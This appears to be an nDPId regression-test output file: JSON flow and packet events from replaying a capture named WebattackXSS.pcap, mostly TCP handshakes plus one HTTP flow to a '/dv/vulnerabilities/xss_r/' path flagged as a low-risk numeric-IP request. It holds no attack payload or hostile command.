+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":3,"flow_last_seen":1499347613719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347613719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VmpAAD4Gb26sEAABwKgKMua+AFCqCgi8Chz2ZoAQAOXQWgAAAQEICgE7XtID5TBH"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347611162,"flow_last_seen":1499347615984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347615984,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347616210,"flow_last_seen":1499347616210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347616210,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1499347616210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347616210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YLdAAD4GZRmsEAABwKgKMubYAFBJnwH3AAAAAKACchDJyQAAAgQFtAQCCAoBO2FAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":2,"flow_last_seen":1499347616211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347616211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5thWFuJlSZ8B+KAScSBbkQAAAgQFtAQCCAoD5TK2ATthQAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":3,"flow_last_seen":1499347616212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347616212,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YLhAAD4GZSCsEAABwKgKMubYAFBJnwH4VhbiZoAQAOX6lwAAAQEICgE7YUED5TK2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5432,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347617491,"flow_last_seen":1499347617491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617491,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5432,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1499347617491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347617491,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VDpAAD4GcZasEAABwKgKMubmAFD8gja7AAAAAKACchDg0gAAAgQFtAQCCAoBO2KBAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":2,"flow_last_seen":1499347617491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347617491,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ubMDNHo\/II2vKAScSAL4QAAAgQFtAQCCAoD5TP2ATtigQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":3,"flow_last_seen":1499347617492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347617492,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VDtAAD4GcZ2sEAABwKgKMubmAFD8gja8zAzR6YAQAOWq6AAAAQEICgE7YoED5TP2"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347485533,"flow_last_seen":1499347490747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347485533,"flow_last_seen":1499347490747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347486787,"flow_last_seen":1499347492748,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347486787,"flow_last_seen":1499347492748,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347489408,"flow_last_seen":1499347494749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347489408,"flow_last_seen":1499347494749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347490659,"flow_last_seen":1499347495749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347490659,"flow_last_seen":1499347495749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347618757,"flow_last_seen":1499347618757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347618757,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1499347618757,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347618757,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UcRAAD4GdAysEAABwKgKMub0AFCevDJ5AAAAAKACchBBkQAAAgQFtAQCCAoBO2O9AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5445,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":2,"flow_last_seen":1499347618757,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347618757,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5vRXo2m0nrwyeqAScSBIAQAAAgQFtAQCCAoD5TUyATtjvQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":3,"flow_last_seen":1499347618758,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347618758,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UcVAAD4GdBOsEAABwKgKMub0AFCevDJ6V6NptYAQAOXnBwAAAQEICgE7Y74D5TUy"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5462,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347621256,"flow_last_seen":1499347621256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347621256,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5462,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1499347621256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347621256,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Hc9AAD4GqAGsEAABwKgKMucOAFD+NnvhAAAAAKACchCWIwAAAgQFtAQCCAoBO2YuAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":2,"flow_last_seen":1499347621256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347621256,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5w6DP0I9\/jZ74qAScSCV\/QAAAgQFtAQCCAoD5TejATtmLgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":3,"flow_last_seen":1499347621257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347621257,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HdBAAD4GqAisEAABwKgKMucOAFD+Nnvigz9CPoAQAOU1BQAAAQEICgE7Zi4D5Tej"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347622524,"flow_last_seen":1499347622524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347622524,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1499347622524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347622524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QPZAAD4GhNqsEAABwKgKMuccAFAFlCedAAAAAKACchDhvwAAAgQFtAQCCAoBO2drAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":2,"flow_last_seen":1499347622524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347622524,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5xwFxGkkBZQnnqAScSA28QAAAgQFtAQCCAoD5TjgATtnawEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":3,"flow_last_seen":1499347622525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347622525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QPdAAD4GhOGsEAABwKgKMuccAFAFlCeeBcRpJYAQAOXV+AAAAQEICgE7Z2sD5Tjg"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347623786,"flow_last_seen":1499347623786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347623786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1499347623786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347623786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EPlAAD4GtNesEAABwKgKMucqAFD89nheAAAAAKACchCYUQAAAgQFtAQCCAoBO2inAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":2,"flow_last_seen":1499347623786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347623786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5yptg31h\/PZ4X6AScSBwSgAAAgQFtAQCCAoD5TocATtopwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":3,"flow_last_seen":1499347623787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347623787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EPpAAD4GtN6sEAABwKgKMucqAFD89nhfbYN9YoAQAOUPUgAAAQEICgE7aKcD5Toc"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347625094,"flow_last_seen":1499347625094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347625094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1499347625094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347625094,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QvlAAD4GgtesEAABwKgKMuc4AFBpNSsUAAAAAKACchB4CQAAAgQFtAQCCAoBO2ntAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":2,"flow_last_seen":1499347625094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347625094,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5zhhGRuGaTUrFaAScSC9AAAAAgQFtAQCCAoD5TtjATtp7QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5502,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":3,"flow_last_seen":1499347625095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347625095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QvpAAD4Ggt6sEAABwKgKMuc4AFBpNSsVYRkbh4AQAOVcBwAAAQEICgE7ae4D5Ttj"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347626349,"flow_last_seen":1499347626349,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347626349,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1499347626349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347626349,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CphAAD4GuzisEAABwKgKMudGAFA4VWG\/AAAAAKACchBw9gAAAgQFtAQCCAoBO2snAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":2,"flow_last_seen":1499347626349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347626349,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ50a6Rl2POFVhwKAScSAZfgAAAgQFtAQCCAoD5TycATtrJwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5513,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":3,"flow_last_seen":1499347626351,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347626351,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CplAAD4Guz+sEAABwKgKMudGAFA4VWHAukZdkIAQAOW4hAAAAQEICgE7aygD5Tyc"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347627616,"flow_last_seen":1499347627616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627616,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1499347627616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347627616,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GbxAAD4GrBSsEAABwKgKMudUAFBilXXYAAAAAKACchAxUgAAAgQFtAQCCAoBO2xkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":2,"flow_last_seen":1499347627616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347627616,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ51QwQXQsYpV12aAScSBMBQAAAgQFtAQCCAoD5T3ZATtsZAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5524,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":3,"flow_last_seen":1499347627617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347627617,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Gb1AAD4GrBusEAABwKgKMudUAFBilXXZMEF0LYAQAOXrDAAAAQEICgE7bGQD5T3Z"} 